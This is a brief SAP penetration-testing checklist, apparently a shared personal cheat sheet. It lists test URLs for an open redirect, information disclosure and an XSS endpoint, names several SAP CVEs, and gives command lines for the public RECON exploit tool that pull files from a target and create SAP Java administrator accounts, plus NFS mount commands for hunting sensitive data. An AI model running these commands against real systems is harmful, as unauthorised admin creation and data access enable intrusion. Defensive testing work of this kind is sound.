Bismillah
For conducting the Pentest you should deploy SAP System on your Network
- Open Redirection Check
https://HOST/sap/public/bc/icf/logoff?redirecturl=MALICIOUSURL
- Unsecured Protocol (HTTP) Check
http://HOST:PORT/sap/public/info
- System Informational Misconfiguration Check
http://HOST:PORT/sap/public/info
- XSS (CVE-2021-42063)
look for /SAPIrExtHelp https://localhost/SAPIrExtHelp
-
SAP Information System 1.0 Shell Upload
-
CVE-2022-22536 (ICMAD SAP)
-
SAP RECON vulnerability (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/SAP_RECON
Download zip file
python RECON.py -H 172.16.30.8 -f /1111.zip
Create SAP JAVA user
python RECON.py -H 172.16.30.8 -u
Create SAP JAVA Administrator user
python RECON.py -H 172.16.30.8 -a
- SSL Vulnerability Check
sslscan
- NFS Mount
nfs-ls nfs://HOST/mount
mkdir mnt && mount -t nfs HOST:/mount ./mnt
Good luck searching sensitive informations
I am looking for SAP Virtual Machine or container for doing pentest simulation, if you have info please kindly DM me @linkedin)
Sharing is Caring
كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناس"